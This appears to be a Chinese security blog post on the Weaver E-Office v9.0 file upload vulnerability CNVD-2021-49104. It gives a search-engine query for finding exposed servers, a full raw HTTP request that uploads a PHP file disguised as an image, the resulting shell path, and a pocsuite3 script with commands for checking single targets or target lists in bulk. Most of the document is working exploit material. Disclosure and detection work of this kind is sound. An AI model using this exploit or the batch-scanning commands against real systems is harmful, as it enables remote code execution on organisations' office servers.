泛微E-Office文件上传漏洞(CNVD-2021-49104)
简介:
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
漏洞描述
泛微e-office是泛微旗下的一款标准协同移动办公平台。
CNVD-2021-49104由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。
该漏洞CVSS评分:9.0,危害等级:高危
空间搜索引擎
app="泛微-EOffice"
影响版本:
泛微 e-office v9.0
漏洞复现
漏洞地址:
POC
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 Host: 127.0.0.1:7899 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Connection: close Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6 Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348 Content-Length: 193 Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 --e64bdf16c554bbc109cecef6451c26a4 Content-Disposition: form-data; name="Filedata"; filename="test.php" Content-Type: image/jpeg <?php phpinfo();?> --e64bdf16c554bbc109cecef6451c26a4--
上传后访问shell路径:
/images/logo/logo-eoffice.php
burpsuit3检测脚本
# -*- coding:utf-8 -*- from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from urllib.parse import urljoin from pocsuite3.lib.utils import random_str class DemoPOC(POCBase): vulID = "CNVD-2021-49104" version ='泛微 e-office v9.0' author = ["HADESI"] vulDate = "2020-12-15" createDate = "2021-11-30" updateDate = "2021-11-30" references =["https://nosec.org/home/detail/4910.html"] name ="泛微E-Office文件上传漏洞(CNVD-2021-49104)" appPowerLink = '' appName = '泛微E-Office' appVersion = 'v9.0' vulType = 'VUL_TYPE.UPLOAD_FILES ' desc = ''' 泛微E-Office文件上传漏洞 ''' samples = [] install_requires = [''] def _verify(self): result ={} path ="/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=" headers={'Content-Type': 'multipart/form-data; boundary=123123'} url = urljoin(self.url, path) data=''' --123123 Content-Disposition: form-data; name="Filedata"; filename="1.php" Content-Type: image/jpeg <?php phpinfo(); ?> --123123--''' try: rr = requests.post(url=url,headers=headers,data=data,timeout=5) resq_results=requests.get(url=self.url+'/images/logo/logo-eoffice.php') if "System" in resq_results.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['path'] = self.url+'/images/logo/logo-eoffice.php' #result['VerifyInfo']['Name'] = payload except Exception as e: pass return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() register_poc(DemoPOC)
单个检测:python cli.py -r pocs\2021\e-cology\20211202_WEB_E-Office_FileUpload.py -u http://ip:port --verify
批量检测:python cli.py -r pocs\2021\e-cology\20211202_WEB_E-Office_FileUpload.py -f 1.txt --verify
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录